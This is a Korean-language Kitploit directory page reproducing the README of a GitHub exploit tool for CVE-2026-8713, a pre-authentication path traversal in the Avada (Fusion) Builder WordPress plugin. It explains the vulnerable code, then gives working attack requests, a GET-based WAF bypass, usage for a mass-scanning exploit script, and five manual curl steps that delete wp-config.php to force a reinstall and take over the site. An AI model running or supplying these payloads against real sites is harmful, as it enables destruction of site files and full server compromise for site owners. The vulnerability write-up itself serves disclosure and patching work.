Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/shinthink/cve-2026-8713
Vulnerability ScannersVulnerability AnalysisExploitationWeb Application ExploitationWAF BypassWeb SecurityPenetration TestingLearning & Education
GitHubshinthink/cve-2026-8713

CVE-2026-8713

Pre-auth path traversal을 통한 임의 파일 삭제 취약점 (Avada (Fusion) Builder <= 3.15.3)으로 RCE 발생 (CVSS 9.1)

저장소 보기
452개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-8713 — Avada (Fusion) Builder WordPress 익스플로잇

인증 없이 경로 탐색 → 임의 파일 삭제 → 강제 재설치 → RCE


개요

CVE-2026-8713은 WordPress용 Avada (Fusion) Builder 플러그인/테마에서 발생하는 CVSS 9.1 치명적 취약점입니다. Fusion_Form_DB_Entries 클래스의 maybe_delete_files() 함수가 공격자가 제어하는 양식 항목 값에서 단순 문자열 치환만으로 파일 시스템 경로를 구성하며, realpath() 검증이나 디렉토리 포함 제한 검사를 수행하지 않습니다.

인증되지 않은 공격자는 fusion_form_submit_ajax 핸들러를 통해 경로 순회 페이로드를 제출합니다. Fusion_Form_DB_Privacy 종료 훅이 privacy_expiration_action=delete로 항목을 처리할 때, 대상 파일이 서버에서 삭제됩니다.

영향을 받는 버전

버전상태
Fusion Builder ≤ 3.15.3취약
Fusion Builder ≥ 3.15.4패치됨
Avada 테마 (전체)번들 플러그인이 취약할 수 있음

참고: Avada 테마 버전(7.x)은 Fusion Builder 플러그인 버전(3.x)과 다릅니다. 취약점은 플러그인에 있지만, 스캐너는 둘 다 탐지합니다.


취약점 메커니즘

근본 원인

fusion-builder/inc/class-fusion-form-db-entries.php에서 maybe_delete_files() 메서드는 포함 검증 없이 문자열 치환을 사용하여 파일 경로를 확인합니다.

root@kitploit:~
$file_path = str_replace($upload['url'], $upload['path'], $value);
// realpath() 검사 없음 — 경로 순회 시퀀스 통과
unlink($file_path);

공격 체인

root@kitploit:~
1. 공격자가 wp_ajax_nopriv_fusion_form_submit_ajax를 통해 Avada 양식 제출
   → 경로 순회: ../../wp-config.php
   → privacy_expiration_action = delete
   → privacy_expiration_interval = 0

2. WordPress 종료 훅이 Fusion_Form_DB_Privacy 실행
   → 저장된 양식 항목 처리
   → 공격자가 제어한 경로에 대해 maybe_delete_files() 호출
   → wp-config.php 삭제

3. WordPress가 설치/설정 모드로 진입
   → 공격자가 사이트를 악성 데이터베이스에 연결
   → 완전한 원격 코드 실행

인증되지 않은 접근

AJAX 핸들러는 wp_ajax_nopriv_로 등록되어 있어 인증되지 않은 사용자도 접근 가능합니다.

root@kitploit:~
POST /wp-admin/admin-ajax.php
  action=fusion_form_submit_ajax
  form_id=<id>
  privacy_expiration_action=delete
  fusion_privacy_expiration_interval=0
  fusion_form_field_<name>=../../wp-config.php

WAF 우회

많은 호스트가 /wp-admin/admin-ajax.php에 대한 POST를 차단합니다. WordPress는 이 엔드포인트에서 GET을 통한 매개변수도 받아들이므로 간단한 우회가 가능합니다.

root@kitploit:~
GET /wp-admin/admin-ajax.php?action=fusion_form_submit_ajax&form_id=<id>&privacy_expiration_action=delete&...

설치

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-8713.git
cd CVE-2026-8713
pip install -r requirements.txt

사용법

root@kitploit:~
# 탐지만 (기본값 — 파일 삭제 안 함)
python cve_2026_8713.py -t target.com

# 대량 탐지
python cve_2026_8713.py -f targets.txt

# 익스플로잇 모드 — wp-config.php 삭제
python cve_2026_8713.py -t target.com --exploit

# 사용자 지정 파일 삭제
python cve_2026_8713.py -t target.com --exploit --delete "../../../debug.log"

인자

root@kitploit:~
  -t, --target      단일 대상 (도메인 또는 IP)
  -f, --file        대상 목록 (한 줄에 하나)
  --exploit         파일 삭제 활성화 (기본값: 탐지만)
  --delete PATH     삭제할 사용자 지정 파일 경로 (기본값: wp-config.php)
  -o, --output      결과를 파일에 저장
  --threads         워커 수 (기본값: 20)
  -v, --verbose     상세 출력 표시

개념 증명

탐지 모드

root@kitploit:~
$ python cve_2026_8713.py -f targets.txt
root@kitploit:~
  CVE-2026-8713  Avada (Fusion) Builder  |  CVSS 9.1
  모드: 탐지  |  대상: 521  |  워커: 20
  ───────────────────────────────────────────────────────

  [익스플로잇]  target-vuln.com      1.2s  양식 #3  (AJAX 열림)
  [취약]        target-waf.com       2.1s  양식 #1  (WAF 차단됨)
  [AVADA]       target-noform.com    0.5s  (양식 없음)
  [-]           target-noavada.com   0.3s

  ───────────────────────────────────────────────────────
  스캔 완료  |  시간: 45초
  ───────────────────────────────────────────────────────
  대상        : 521
  Avada 탐지  : 47
  양식 발견   : 12
  취약        : 9

익스플로잇 모드

root@kitploit:~
$ python cve_2026_8713.py -t target.com --exploit -v
root@kitploit:~
  CVE-2026-8713 — Avada Builder 익스플로잇
  CVSS 9.1 | 인증 없음 | 경로 탐색 → 파일 삭제 → RCE

    [+] Avada 양식 발견: id=3
    [+] POST form_id=3: HTTP 403 (WAF 차단됨)
    [+] GET form_id=3: HTTP 200 (WAF 우회됨)

  호스트   : target.com
  Avada    : 예
  양식     : 3
  삭제됨   : wp-config.php (강제 재설치 → RCE)
  시간     : 3.2초

수동 익스플로잇

1단계 — Avada 확인

root@kitploit:~
curl -sk 'https://target.com/wp-content/themes/Avada/style.css' | head -5

2단계 — 양식 ID 찾기

root@kitploit:~
curl -sk 'https://target.com/' | grep -oP 'fusion-form[^"]*form-id=["\x27](https://github.com/shinthink/cve-2026-8713/blob/main/%5Cd%2B)'

3단계 — 경로 순회로 양식 제출

root@kitploit:~
curl -sk -X POST \
  -d 'action=fusion_form_submit_ajax' \
  -d 'form_id=3' \
  -d 'privacy_expiration_action=delete' \
  -d 'fusion_privacy_expiration_interval=0' \
  -d 'fusion_form_field_x=../../wp-config.php' \
  'https://target.com/wp-admin/admin-ajax.php'

4단계 — WAF 우회 (POST 차단 시)

root@kitploit:~
curl -sk 'https://target.com/wp-admin/admin-ajax.php?action=fusion_form_submit_ajax&form_id=3&privacy_expiration_action=delete&fusion_privacy_expiration_interval=0&fusion_form_field_x=../../wp-config.php'

5단계 — RCE 확인 및 익스플로잇

root@kitploit:~
# 사이트가 설치 모드인가?
curl -sk -o /dev/null -w '%{http_code}' 'https://target.com/wp-admin/install.php'
# HTTP 200 → wp-config 삭제됨 → 악성 DB 연결 → 완전한 RCE

면책 조항

교육 및 승인된 테스트 목적으로만 사용하십시오.

이 소프트웨어는 승인된 침투 테스트를 수행하는 보안 전문가, 자체 인프라를 감사하는 조직, 취약점 악용을 연구하는 연구자를 대상으로 합니다.

컴퓨터 시스템에 대한 무단 접근은 불법이며 다음을 위반할 수 있습니다:

  • 미국: Computer Fraud and Abuse Act (18 U.S.C. 1030)
  • 인도네시아: UU ITE Pasal 30 & 46
  • 유럽 연합: Directive 2013/40/EU
  • 영국: Computer Misuse Act 1990

저자는 오용에 대해 어떠한 책임도 지지 않습니다.


참고 자료

자료링크
IONIX Advisoryionix.io/threat-center/cve-2026-8713
Wordfence Advisorywordfence.com
Patchstackpatchstack.com
NVD EntryCVE-2026-8713

이 프로젝트는 ThemeFusion 또는 Avada와 제휴 관계가 아닙니다.

도구 다운로드